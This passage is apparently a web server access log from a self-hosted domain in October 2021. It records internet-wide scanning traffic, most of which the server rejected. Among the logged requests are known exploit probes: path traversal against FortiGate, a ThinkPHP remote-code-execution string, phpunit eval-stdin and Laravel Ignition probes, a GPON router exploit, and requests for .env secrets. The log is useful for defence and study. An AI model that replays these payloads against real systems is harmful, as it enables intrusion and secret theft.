Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:12 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 178.128.243.109] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:13 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 178.128.243.109] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:13 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 178.128.243.109] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:14 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 178.128.243.109] [Length 252] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [28/Oct/2021:22:22:14 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 178.128.243.109] [Length 0] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [28/Oct/2021:22:22:15 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 178.128.243.109] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:22:15 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 178.128.243.109] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [28/Oct/2021:22:31:11 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.77.162.18] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [28/Oct/2021:22:35:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.79.134.185] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [28/Oct/2021:22:39:03 +0000] 400 - GET http localhost "/ab2g" [Client 143.244.167.175] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:22:39:03 +0000] 400 - GET http localhost "/ab2h" [Client 143.244.167.175] [Length 154] [Gzip -] "-" "-" [28/Oct/2021:23:43:00 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Oct/2021:23:43:00 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:00:06:04 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Oct/2021:01:05:50 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:01:05:50 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:01:49:09 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.199.126] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Oct/2021:02:26:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.252] [Length 0] [Gzip -] "-" "-" [29/Oct/2021:02:42:22 +0000] 400 - - http localhost "-" [Client 209.97.182.76] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:02:42:22 +0000] 400 - - http localhost "-" [Client 209.97.182.76] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:02:42:23 +0000] 400 - POST http 192.168.204.159 "/" [Client 209.97.182.76] [Length 252] [Gzip -] "WinHttpClient" "-" [29/Oct/2021:02:42:23 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 209.97.182.76] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" [29/Oct/2021:02:48:34 +0000] 400 - - http localhost "-" [Client 159.203.0.168] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:02:48:35 +0000] 400 - - http localhost "-" [Client 159.203.58.61] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:02:50:44 +0000] 400 - - http localhost "-" [Client 165.227.12.150] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:02:57:24 +0000] 400 - - http localhost "-" [Client 137.184.209.189] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:03:01:08 +0000] 400 - - http localhost "-" [Client 167.172.54.9] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:03:48:57 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Oct/2021:04:01:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Oct/2021:04:19:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.137.23.93] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Oct/2021:04:44:28 +0000] 400 - GET http localhost "/ab2g" [Client 143.198.138.68] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:04:44:29 +0000] 400 - GET http localhost "/ab2h" [Client 143.198.138.68] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:05:08:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.159] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [29/Oct/2021:05:08:56 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 45.154.255.147] [Length 0] [Gzip -] "-" "-" [29/Oct/2021:05:08:57 +0000] 444 - OPTIONS https localhost "/" [Client 45.154.255.147] [Length 0] [Gzip -] "-" "-" [29/Oct/2021:05:08:58 +0000] 400 - - https localhost "-" [Client 45.154.255.147] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:05:09:03 +0000] 400 - - https localhost "-" [Client 45.129.56.200] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:05:11:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.148] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Oct/2021:05:11:48 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Oct/2021:05:12:39 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Oct/2021:05:34:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Oct/2021:06:02:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [29/Oct/2021:06:11:59 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.161] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [29/Oct/2021:06:17:41 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:06:17:41 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:06:21:25 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:26 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:26 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:30 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:06:21:32 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:33 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:33 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [29/Oct/2021:06:21:34 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:34 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:35 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:21:35 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:06:35:02 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:06:35:03 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:07:28:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.251.234] [Length 0] [Gzip -] "-" "-" [29/Oct/2021:07:45:30 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:07:45:31 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:08:15:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.134.116] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [29/Oct/2021:08:15:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 117.50.110.69] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [29/Oct/2021:08:16:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.152.94] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [29/Oct/2021:08:53:08 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.199.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Oct/2021:09:18:21 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [29/Oct/2021:09:24:49 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Oct/2021:10:06:03 +0000] 400 - GET http 64.22.31.253 "/login" [Client 80.82.78.39] [Length 252] [Gzip -] "Mozilla/5.0" "-" [29/Oct/2021:10:27:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [29/Oct/2021:10:41:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Oct/2021:10:47:49 +0000] 400 - GET http localhost "/ab2g" [Client 68.183.43.90] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:10:47:49 +0000] 400 - GET http localhost "/ab2h" [Client 68.183.43.90] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:11:06:36 +0000] 444 - GET https tpm.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [29/Oct/2021:11:37:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Oct/2021:12:00:57 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:12:31:41 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Oct/2021:12:34:05 +0000] 444 - GET https traefik.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [29/Oct/2021:12:38:42 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:12:38:42 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:12:50:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [29/Oct/2021:12:50:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [29/Oct/2021:13:17:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.206.109] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Oct/2021:14:15:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Oct/2021:14:20:50 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:14:20:51 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:14:28:14 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:14:28:15 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:14:28:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.201.79] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Oct/2021:17:28:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [29/Oct/2021:17:56:32 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:17:56:32 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:18:17:57 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:18:17:57 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:19:05:01 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:19:05:01 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:19:05:48 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:19:05:48 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Oct/2021:19:27:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.138] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Oct/2021:19:33:01 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [29/Oct/2021:19:54:19 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Oct/2021:19:54:19 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Oct/2021:20:11:49 +0000] 444 - GET https opds.moralanimal.net "/" [Client 34.96.130.13] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [29/Oct/2021:20:44:44 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:44 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:47 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:48 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:49 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:50 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [29/Oct/2021:20:44:50 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:52 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:52 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:44:56 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [29/Oct/2021:20:44:57 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:20:45:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Oct/2021:21:06:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Oct/2021:22:25:00 +0000] 444 - GET https 192.168.1.12 "/" [Client 